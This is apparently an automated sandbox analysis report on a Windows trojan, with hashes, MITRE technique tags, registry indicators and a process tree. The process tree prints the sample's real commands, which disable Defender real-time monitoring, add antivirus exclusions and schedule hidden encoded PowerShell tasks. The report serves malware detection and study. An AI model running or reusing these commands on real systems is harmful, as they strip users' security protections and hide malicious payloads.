e23ad43ad1730cb25b11f18add7b738c59ecbbe9ce1006e7847d5b965fb9ef72

Analysis

max time kernel
153s
max time network
145s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
29/10/2022, 06:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

7.3MB
MD5

1747dafa2b2b2b16244925f00d37eaeb
SHA1

1db1a2b0293a16beb65b65d02401842f82aca174
SHA256

e23ad43ad1730cb25b11f18add7b738c59ecbbe9ce1006e7847d5b965fb9ef72
SHA512

1e01b49098108e779fd7e499c54837c95b6d40f53a01a5157700a6a1658afc7144867704a001cb5dc878b4e1b1359731c5e67f6551b69d014811399ca4d86d43
SSDEEP

196608:91OdN9lsVpHxcSdgggP2/SOcb8D07AvXhkvUbfv+UVJmQrI:3OVlspHX9/SOU8w7Avxkev+oMQrI

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 36 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\vhTqjLQymokpPpPb = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qwQKalOeU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\qKCUkteWWCrbVFVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\vhTqjLQymokpPpPb = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XSxxgBHfieTOC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fwdFzFoCzBKlRQNBqUR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XSxxgBHfieTOC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\WGlEvBqMGupapHPaj = "0"	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\vhTqjLQymokpPpPb = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DTVeiSnVEyUn = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fpJTwAuoAMgU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\qKCUkteWWCrbVFVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fwdFzFoCzBKlRQNBqUR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qwQKalOeU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\vhTqjLQymokpPpPb = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DTVeiSnVEyUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fpJTwAuoAMgU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\WGlEvBqMGupapHPaj = "0"	reg.exe

Executes dropped EXE 4 IoCs

pid	Process
988	Install.exe
1940	Install.exe
1572	TEkxFhC.exe
1636	nKmHKoI.exe

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Loads dropped DLL 8 IoCs

pid	Process
1768	file.exe
988	Install.exe
988	Install.exe
988	Install.exe
988	Install.exe
1940	Install.exe
1940	Install.exe
1940	Install.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	TEkxFhC.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	TEkxFhC.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	TEkxFhC.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bVdqBxoxNAgpdKrXAY.job	schtasks.exe
File created	C:\Windows\Tasks\PuhPMVgEjGGxLrdgk.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1916	schtasks.exe
1744	schtasks.exe
2008	schtasks.exe
1396	schtasks.exe
1744	schtasks.exe
1800	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 8 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	wscript.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2024	powershell.EXE
2024	powershell.EXE
2024	powershell.EXE
360	powershell.EXE
360	powershell.EXE
360	powershell.EXE
1684	powershell.EXE
1684	powershell.EXE
1684	powershell.EXE
1544	powershell.EXE
1544	powershell.EXE
1544	powershell.EXE

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2024	powershell.EXE
Token: SeDebugPrivilege	360	powershell.EXE
Token: SeDebugPrivilege	1684	powershell.EXE
Token: SeDebugPrivilege	1544	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1768 wrote to memory of 988	1768	file.exe	27
PID 1768 wrote to memory of 988	1768	file.exe	27
PID 1768 wrote to memory of 988	1768	file.exe	27
PID 1768 wrote to memory of 988	1768	file.exe	27
PID 1768 wrote to memory of 988	1768	file.exe	27
PID 1768 wrote to memory of 988	1768	file.exe	27
PID 1768 wrote to memory of 988	1768	file.exe	27
PID 988 wrote to memory of 1940	988	Install.exe	28
PID 988 wrote to memory of 1940	988	Install.exe	28
PID 988 wrote to memory of 1940	988	Install.exe	28
PID 988 wrote to memory of 1940	988	Install.exe	28
PID 988 wrote to memory of 1940	988	Install.exe	28
PID 988 wrote to memory of 1940	988	Install.exe	28
PID 988 wrote to memory of 1940	988	Install.exe	28
PID 1940 wrote to memory of 1464	1940	Install.exe	30
PID 1940 wrote to memory of 1464	1940	Install.exe	30
PID 1940 wrote to memory of 1464	1940	Install.exe	30
PID 1940 wrote to memory of 1464	1940	Install.exe	30
PID 1940 wrote to memory of 1464	1940	Install.exe	30
PID 1940 wrote to memory of 1464	1940	Install.exe	30
PID 1940 wrote to memory of 1464	1940	Install.exe	30
PID 1940 wrote to memory of 1800	1940	Install.exe	32
PID 1940 wrote to memory of 1800	1940	Install.exe	32
PID 1940 wrote to memory of 1800	1940	Install.exe	32
PID 1940 wrote to memory of 1800	1940	Install.exe	32
PID 1940 wrote to memory of 1800	1940	Install.exe	32
PID 1940 wrote to memory of 1800	1940	Install.exe	32
PID 1940 wrote to memory of 1800	1940	Install.exe	32
PID 1464 wrote to memory of 1676	1464	forfiles.exe	34
PID 1464 wrote to memory of 1676	1464	forfiles.exe	34
PID 1464 wrote to memory of 1676	1464	forfiles.exe	34
PID 1464 wrote to memory of 1676	1464	forfiles.exe	34
PID 1464 wrote to memory of 1676	1464	forfiles.exe	34
PID 1464 wrote to memory of 1676	1464	forfiles.exe	34
PID 1464 wrote to memory of 1676	1464	forfiles.exe	34
PID 1800 wrote to memory of 1104	1800	forfiles.exe	35
PID 1800 wrote to memory of 1104	1800	forfiles.exe	35
PID 1800 wrote to memory of 1104	1800	forfiles.exe	35
PID 1800 wrote to memory of 1104	1800	forfiles.exe	35
PID 1800 wrote to memory of 1104	1800	forfiles.exe	35
PID 1800 wrote to memory of 1104	1800	forfiles.exe	35
PID 1800 wrote to memory of 1104	1800	forfiles.exe	35
PID 1676 wrote to memory of 1064	1676	cmd.exe	36
PID 1676 wrote to memory of 1064	1676	cmd.exe	36
PID 1676 wrote to memory of 1064	1676	cmd.exe	36
PID 1676 wrote to memory of 1064	1676	cmd.exe	36
PID 1676 wrote to memory of 1064	1676	cmd.exe	36
PID 1676 wrote to memory of 1064	1676	cmd.exe	36
PID 1676 wrote to memory of 1064	1676	cmd.exe	36
PID 1104 wrote to memory of 1752	1104	cmd.exe	37
PID 1104 wrote to memory of 1752	1104	cmd.exe	37
PID 1104 wrote to memory of 1752	1104	cmd.exe	37
PID 1104 wrote to memory of 1752	1104	cmd.exe	37
PID 1104 wrote to memory of 1752	1104	cmd.exe	37
PID 1104 wrote to memory of 1752	1104	cmd.exe	37
PID 1104 wrote to memory of 1752	1104	cmd.exe	37
PID 1676 wrote to memory of 1984	1676	cmd.exe	38
PID 1676 wrote to memory of 1984	1676	cmd.exe	38
PID 1676 wrote to memory of 1984	1676	cmd.exe	38
PID 1676 wrote to memory of 1984	1676	cmd.exe	38
PID 1676 wrote to memory of 1984	1676	cmd.exe	38
PID 1676 wrote to memory of 1984	1676	cmd.exe	38
PID 1676 wrote to memory of 1984	1676	cmd.exe	38
PID 1104 wrote to memory of 1960	1104	cmd.exe	39

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1768
- C:\Users\Admin\AppData\Local\Temp\7zSF9CA.tmp\Install.exe
  .\Install.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:988
- - C:\Users\Admin\AppData\Local\Temp\7zSFEBA.tmp\Install.exe
    .\Install.exe /S /site_id "525403"
    3⤵
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Drops file in System32 directory
    - Enumerates system info in registry
    - Suspicious use of WriteProcessMemory
    PID:1940
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1464
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1676
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        6⤵
        
        PID:1064
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        6⤵
        
        PID:1984
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1800
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1104
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        6⤵
        
        PID:1752
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        6⤵
        
        PID:1960
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "grUUindFj" /SC once /ST 00:51:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      4⤵
      Creates scheduled task(s)
      PID:1916
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "grUUindFj"
      4⤵
      PID:436
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "grUUindFj"
      4⤵
      PID:1900
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "bVdqBxoxNAgpdKrXAY" /SC once /ST 07:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\WGlEvBqMGupapHPaj\LFqhtLxKdKUjncZ\TEkxFhC.exe\" Pu /site_id 525403 /S" /V1 /F
      4⤵
      Drops file in Windows directory
      Creates scheduled task(s)
      PID:1744

C:\Windows\system32\taskeng.exe
taskeng.exe {CAE9D8BE-E142-407A-9793-EE828453A401} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]
1⤵
PID:1608
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2024
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1080
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:360
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1052
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1684
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:676
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1544
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1944

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1600

C:\Windows\system32\taskeng.exe
taskeng.exe {60DD26D1-0390-49B4-BE19-BD8414BFCC6B} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1868
- C:\Users\Admin\AppData\Local\Temp\WGlEvBqMGupapHPaj\LFqhtLxKdKUjncZ\TEkxFhC.exe
  C:\Users\Admin\AppData\Local\Temp\WGlEvBqMGupapHPaj\LFqhtLxKdKUjncZ\TEkxFhC.exe Pu /site_id 525403 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:1572
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gOCjhYiat" /SC once /ST 02:56:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2008
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gOCjhYiat"
    3⤵
    PID:1204
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gOCjhYiat"
    3⤵
    PID:1516
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:2036
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1292
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:1072
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1472
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gSnMdwFeh" /SC once /ST 06:49:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1396
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gSnMdwFeh"
    3⤵
    PID:456
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gSnMdwFeh"
    3⤵
    PID:1832
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\vhTqjLQymokpPpPb" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1964
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\vhTqjLQymokpPpPb" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1048
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\vhTqjLQymokpPpPb" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:436
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\vhTqjLQymokpPpPb" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1632
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\vhTqjLQymokpPpPb" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1980
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\vhTqjLQymokpPpPb" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1636
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\vhTqjLQymokpPpPb" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1308
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\vhTqjLQymokpPpPb" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1912
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\vhTqjLQymokpPpPb\jXZJKnpW\mdSjDufLZraQwvLd.wsf"
    3⤵
    PID:1740
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\vhTqjLQymokpPpPb\jXZJKnpW\mdSjDufLZraQwvLd.wsf"
    3⤵
    - Modifies data under HKEY_USERS
    PID:760
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DTVeiSnVEyUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1744
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DTVeiSnVEyUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1620
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XSxxgBHfieTOC" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1720
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XSxxgBHfieTOC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1480
  - - C:\Windows\SysWOW64\reg.exe
